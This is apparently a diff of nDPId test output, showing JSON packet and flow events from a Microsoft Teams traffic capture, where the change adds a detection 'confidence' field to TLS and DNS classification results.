 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041684317,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0FJpAAHUGEAYNaxILwKgBBgG77IU13hw0zZy4moAS\/\/\/HZQAAAgQFoAEDAwgBAQQC"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041684317,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGWazAqAEGDWsSC+yFAbvNnLiaNd4cNVAQIADoJAAA"}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01655{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1699,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041684306,"flow_last_seen":1587041684317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1587041684317,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01681{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1722,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041684306,"flow_last_seen":1587041684362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1587041684362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"substrate.office.com","server_names":"outlook.office.com,attachment.outlook.office.net,attachment.outlook.officeppe.net,bookings.office.com,delve.office.com,edge.outlook.office365.com,edgesdf.outlook.com,img.delve.office.com,outlook.live.com,outlook-sdf.live.com,outlook-sdf.office.com,sdfedge-pilot.outlook.com,substrate.office.com,substrate-sdf.office.com,afd-k-acdc-direct.office.com,beta-sdf.yammer.com,teams-sdf.yammer.com,beta.yammer.com,teams.yammer.com,attachments.office.net,attachments-sdf.office.net,afd-k.office.com,afd-k-sdf.office.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Outlook.office.com","alpn":"h2,http\/1.1","fingerprint":"AA:D3:F5:66:06:48:AA:F8:8E:9B:79:D6:7F:1D:53:EA:3F:97:03:A2"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041684611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1753,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1587041685090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1587041685090,"pkt":"EBMx8Tl2KDc3AG3ICABFAABJHhYAAP8RGjbAqAEGwKgBAe89ADUANcKVVKoBAAABAAAAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1775,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685090,"flow_last_seen":1587041685090,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1587041685090,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1587041685091,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1587041685091,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZE40AAP8RJK\/AqAEGwKgBAdGuADUARafs9AEBAAABAAAAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AABwAAQ=="}
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1776,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685091,"flow_last_seen":1587041685091,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685091,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1587041685092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1587041685092,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZD5kAAP8RKKPAqAEGwKgBAf7OADUARYKEB0oBAAABAAAAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAQ=="}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685092,"flow_last_seen":1587041685092,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041685092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1587041685093,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1587041685093,"pkt":"EBMx8Tl2KDc3AG3ICABFAABRstMAAP8RhXDAqAEGwKgBAcXdADUAPUwYqlcBAAABAAAAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1778,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685093,"flow_last_seen":1587041685093,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041685093,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1587041685104,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":173,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":173,"pkt_l4_len":139,"ts_msec":1587041685104,"pkt":"KDc3AG3IEBMx8Tl2CABFAACfqZ9AADkRFFfAqAEBwKgBBgA10a4AiwAA9AGBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AABwAAcAMAAUAAQAADYsAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJABwAAQAAAAUAECoBARHxAHAAAAAAAG\/dVKE="}
-00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}}
+00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1781,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041685104,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"42.1.1.17"}}
 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1587041685105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"ts_msec":1587041685105,"pkt":"KDc3AG3IEBMx8Tl2CABFAACTMl9AADkRi6PAqAEBwKgBBgA1\/s4AfwAAB0qBgAABAAIAAAAAD3Ryb3V0ZXIyLWFzc2UtYQd0cm91dGVyBXRlYW1zCW1pY3Jvc29mdANjb20AAAEAAcAMAAUAAQAADNUAHg90cm91dGVyMi1hc3NlLWEIY2xvdWRhcHADbmV0AMBJAAEAAQAAAAgABDRyDy0="}
-00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}}
+00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1782,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041685105,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"trouter2-asse-a.trouter.teams.microsoft.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.15.45"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685106,"flow_last_seen":1587041685106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041685106,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1587041685106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041685106,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNWvAqAEGNHIPLeyHAbsC\/Q6WAAAAALAC\/\/9IhwAAAgQFtAEDAwUBAQgKMIS4zgAAAAAEAgAA"}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1587041685127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1587041685127,"pkt":"KDc3AG3IEBMx8Tl2CABFAADKzTRAADkR8JbAqAEBwKgBBgA1xd0AtgAAqleBgAABAAMAAAAAA2FwaQtmbGlnaHRwcm94eQV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAA4OACoDYXBpC2ZsaWdodHByb3h5BXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsACcbYy1mbGlnaHRwcm94eS1ldW5vLTAxLXRlYW1zCGNsb3VkYXBwwGbAdwABAAEAAAAGAAQ0ck2I"}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1792,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1587041685127,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"api.flightproxy.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.136"}}
 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1587041685136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1587041685136,"pkt":"KDc3AG3IEBMx8Tl2CABFAADDZa9AADkRWCPAqAEBwKgBBgA17z0ArwAAVKqBgAABAAMAAAAABGV1YXoCdHIFdGVhbXMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAALoAAiBGV1YXoCdHIFdGVhbXMOdHJhZmZpY21hbmFnZXIDbmV0AMA5AAUAAQAAAAAAMBJiLXRyLXRlYW1zLWV1bm8tMDULbm9ydGhldXJvcGUIY2xvdWRhcHAFYXp1cmXAJMBnAAEAAQAAAAoABDRy+ns="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1797,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1587041685136,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"euaz.tr.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.250.123"}}
